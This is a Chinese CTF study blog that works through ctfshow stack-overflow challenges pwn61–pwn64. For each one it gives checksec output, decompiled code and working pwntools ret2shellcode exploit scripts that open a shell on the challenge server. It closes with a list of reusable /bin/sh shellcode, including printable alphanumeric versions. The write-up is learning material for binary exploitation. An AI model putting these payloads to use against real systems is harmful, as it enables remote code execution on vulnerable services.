ctfshow刷题笔记—栈溢出—pwn61~pwn64
目录
前言
一、pwn61(输出了什么?)
二、pwn62(短了一点)
三、pwn63(又短了一点)
四、pwn64(有时候开启某种保护并不代表这条路不通)
五、一些shellcode
前言
这几道都是与shellcode有关的题,实在是不会写,还是试了试,记录一下,收集了一些shellcode。
一、pwn61(输出了什么?)
checksec 一下:
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn61
[*] '/home/kali/桌面/ctfshoww/pwn61'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable
RWX: Has RWX segments
Stripped: No开了地址随机化。
现在先看一下main函数
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v4; // [sp+0h] [bp-10h]@1
__int64 v5; // [sp+8h] [bp-8h]@1
v4 = 0LL;
v5 = 0LL;
setvbuf(_bss_start, 0LL, 1, 0LL);
logo();
puts("Welcome to CTFshow!");
printf("What's this : [%p] ?\n", &v4, 0LL, 0LL);
puts("Maybe it's useful ! But how to use it?");
gets(&v4);
return 0;
}主要是打印logo信息,值得注意的是会输出一个地址,查看一下v4:
0x10+x08,我们写入shellcode以后,通过返回v4的地址取让程序执行shellcode
本地运行一下:
Welcome to CTFshow!
What's this : [0x7ffdb824c790] ?
Maybe it's useful ! But how to use it?v4ar=0x7ffd9de01430
一开始我就是这样写的:
from pwn import *
context.log_level='debug'
context.arch='amd64'
p=remote("pwn.challenge.ctf.show",28164)
pad=b'a'*(0x10+0x8)
v4ar=0x7ffdb824c790
shellcode=asm(shellcraft.sh())
payload1=pad+p64(v4ar)+shellcode
p.sendline(payload1)
p.interactive()发现打不通,似乎忽略了一些东西,于是去读了大佬们的文章。
遇到的一个问题是shellcode太长,超出了v4,v5的范围,这是为什么呢?
Shellcode 的长度通常会超过 v5 的空间(8 字节)。如果直接覆盖 v5,Shellcode 的部分内容可能会被截断。此外,leave ret 之后,程序可能会跳转到一个无效地址,导致崩溃。
去搜索了一下leave
等价于 mov rsp, rbp 和 pop rbp。
它将 rbp 的值赋给 rsp,从而恢复上一个栈帧的栈指针。
然后从栈上弹出 rbp 的值,恢复上一个栈帧的基指针。
所以我们把shellcode写在v5后面就是pad+b’a’*0x8的位置,因为还有一个返回地址的位置.
还有就是输出的地址是动态的,每次不一样。
from pwn import *
context(arch="amd64",log_level="debug")
p=remote("pwn.challenge.ctf.show",28297)
pad=0x10+8
shellcode = asm(shellcraft.sh())
p.recvuntil("What's this : [")
v5ar = eval(p.recvuntil(b"]",drop=True))
#drop=True是为去掉"]"
#eval()是将str数据转为整型数据
print(hex(v5ar))
payload=flat([cyclic(pad),v5ar+pad+8,shellcode])
p.sendline(payload)
p.interactive()
注意返回地址v5的地址加pad+8,不是填充字符。
二、pwn62(短了一点)
checksec和上一道题差不多:
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn62
[*] '/home/kali/桌面/ctfshoww/pwn62'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable
RWX: Has RWX segments
Stripped: No也是地址随机化,提前运行的界面和上一道题差不多,会给一个地址。
拖进ida看一看。
看一下main函数:
int __cdecl main(int argc, const char **argv, const char **envp)
{
FILE *v3; // rdi@1
__int64 buf; // [sp+0h] [bp-10h]@1
__int64 v6; // [sp+8h] [bp-8h]@1
buf = 0LL;
v6 = 0LL;
v3 = _bss_start;
setvbuf(_bss_start, 0LL, 1, 0LL);
logo(v3, 0LL);
puts("Welcome to CTFshow!");
printf("What's this : [%p] ?\n", &buf, 0LL, 0LL);
puts("Maybe it's useful ! But how to use it?");
read(0, &buf, 0x38uLL);
return 0;
}看一下这个buf:
-0000000000000010 buf dq ?
-0000000000000008 var_8 dq ?
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
0x10+0x8
这里的shellcode是有限制的。
from pwn import *
context(arch="amd64",log_level="debug")
p=remote("pwn.challenge.ctf.show",28295)
offset=0x10+0x8
p.recvuntil("[")
buf_ar=eval(p.recvuntil(b"]",drop=True))
print(hex(buf_ar))
shellcode=b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05'
payload=offset*b'a'+p64(buf_ar+offset+8)+shellcode
p.sendline(payload)
p.interactive()
三、pwn63(又短了一点)
checksec一下:
[*] You have the latest version of Pwntools (4.14.0)
[*] '/home/kali/桌面/ctfshoww/pwn63'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable
RWX: Has RWX segments
Stripped: No
开了地址随机化,拖进ida看一看和上一道题有什么区别。
确实有一些变化:
puts("Maybe it's useful ! But how to use it?");
read(0, &buf, 0x37uLL);看一下buf
-0000000000000010 buf dq ?
-0000000000000008 var_8 dq ?
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)0x10+0x8
from pwn import *
context(arch="amd64",log_level="debug")
p=remote("pwn.challenge.ctf.show",28222)
offset=0x10+0x8
p.recvuntil("[")
buf_ar=eval(p.recvuntil(b"]",drop=True))
print(hex(buf_ar))
shell=b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05'
payload=offset*b'a'+p64(buf_ar+offset+8)+shell
p.sendline(payload)
p.interactive()
四、pwn64(有时候开启某种保护并不代表这条路不通)
有点意思,先checksec一下:
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn64
[*] '/home/kali/桌面/ctfshoww/pwn64'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No虽然开了栈不可执行,但是程序里有不一样的东西:
buf = mmap(0, 0x400u, 7, 34, 0, 0);一开始我也不知道这是什么,查了一下:
mmap 是一个系统调用,用于创建一个内存映射区域。它通常用于以下场景:
·映射文件到内存,以便可以像访问内存一样访问文件内容。
·创建匿名内存区域,用于分配动态内存。
·共享内存,用于进程间通信。
根据之前学的知识,7(port参数)是可读可写的意思,所以,我们任然可以注入shellcode。
void* mmap(void* addr, size_t length, int prot, int flags, int fd, off_t offset);
0x400字节足够我们放下shellcode,总之试一试:
from pwn import *
p=remote("wn.challenge.ctf.show",28201)
shellcode=asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()打通之后快些ls,因为有定时器,如果想更长一点可以加一段shellcode,但是用处不大,因为我也不太会写shellcode,所以问了问人机了解了一下:
from pwn import *
p=remote("wn.challenge.ctf.show",28201)
alarm_close=asm("""
mov eax,37
xor ebx,ebx
int 0x80
""",arch='i386')
shellcode=asm(shellcraft.sh())
payload=alarm_close+shellcode
p.sendline(payload)
p.interactive()
五、一些shellcode
关于shellcode我也不会写,所以去搜了一些shellcode,一般情况下还是能用的。
不可见:
32位段字节shellcode(21字节)
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x8064位较短的shellcode(23字节)
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05可见版本(由可见字符组成):
X64:
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t32位:
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIRJTKV8MIPR2FU86M3SLIZG2H6O43SX30586OCRCYBNLIM3QBKXDHS0C0EPVOE22IBNFO3CBH5P0WQCK9KQXMK0AA继续学习中......